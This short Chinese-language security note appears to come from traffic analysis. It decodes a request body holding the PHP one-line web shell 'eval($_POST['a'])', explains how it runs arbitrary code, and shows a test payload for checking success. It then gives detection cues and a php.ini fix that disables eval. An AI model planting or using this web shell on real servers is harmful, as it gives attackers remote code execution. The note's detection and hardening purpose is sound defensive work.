请求体解码为：

<?php eval($_POST['a']);?>

一句话木马。

eval()：将括号内的字符串解析为php代码。

$_POST[‘a’]：a=XXX，向后台传输的参数

所有的字符串放入到eval当中，eval会把字符串解析为php代码来进行执行，那么结合$_POST[‘a’]的话，只要使用post传输时在name为a的值中写入任何字符串，都可以当做php代码来执行。

利用示例：

URL：

XXX.php?a=XXX

威胁分析：

1、判断是否利用该方式攻击：

请求内容中有该内容，或请求内容中base64解码后有该内容。

2、判断是否攻击成功：

验证：

访问URL为：

XXX.php?a=<?= " 123" ?>

查看回显

# 防护方法

PHP禁用eval

php.ini
disable_functions = phpinfo,eval